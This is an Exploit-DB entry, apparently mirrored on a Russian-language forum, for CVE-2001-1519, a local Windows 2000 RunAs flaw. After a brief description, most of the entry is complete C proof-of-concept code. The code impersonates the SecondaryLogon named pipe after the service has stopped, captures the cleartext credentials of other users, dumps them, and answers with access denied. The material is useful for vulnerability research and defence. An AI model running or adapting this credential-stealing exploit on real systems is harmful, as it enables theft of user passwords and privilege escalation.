- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21069
- Проверка EDB
-
- Пройдено
- Автор
- CAMISADE
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2001-1519
- Дата публикации
- 2001-12-11
C:
// source: https://www.securityfocus.com/bid/3185/info
The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu.
When the RunAs service is invoked, it creates a named pipe for client for communication of credentials (in cleartext).
If the RunAs service is stopped, the attacker can create a named pipe with the same name to which credentials will be communicated when another user tries to use 'RunAs'.
// radix1112200101.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#define MAX_IN_BUF 0x1000
#define MAX_OUT_BUF 0x4
#define MAX_INST 0xA
#define SECONDARY_LOGON_PIPE _T("\\\\.\\pipe\\SecondaryLogon")
void main()
{
HANDLE hPipe;
hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF,
NMPWAIT_USE_DEFAULT_WAIT, 0);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf("Can't create secondary logon pipe. Error %d\n", GetLastError());
return;
}
printf("Created pipe and waiting for clients...\n");
if (ConnectNamedPipe(hPipe, 0))
{
UCHAR InBuf[MAX_IN_BUF];
DWORD dwReadCount;
while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0))
{
printf("Read %d bytes. (ASCII Dump)\n", dwReadCount);
DWORD dwPos;
for (dwPos = 0; dwPos < dwReadCount; dwPos++)
{
printf("%c ", InBuf[dwPos]);
if ((dwPos % 16) == 0)
printf("\n");
}
DWORD dwReply = ERROR_ACCESS_DENIED;
DWORD dwWroteCount;
WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0);
}
}
DisconnectNamedPipe(hPipe);
CloseHandle(hPipe);
}
- Источник
- www.exploit-db.com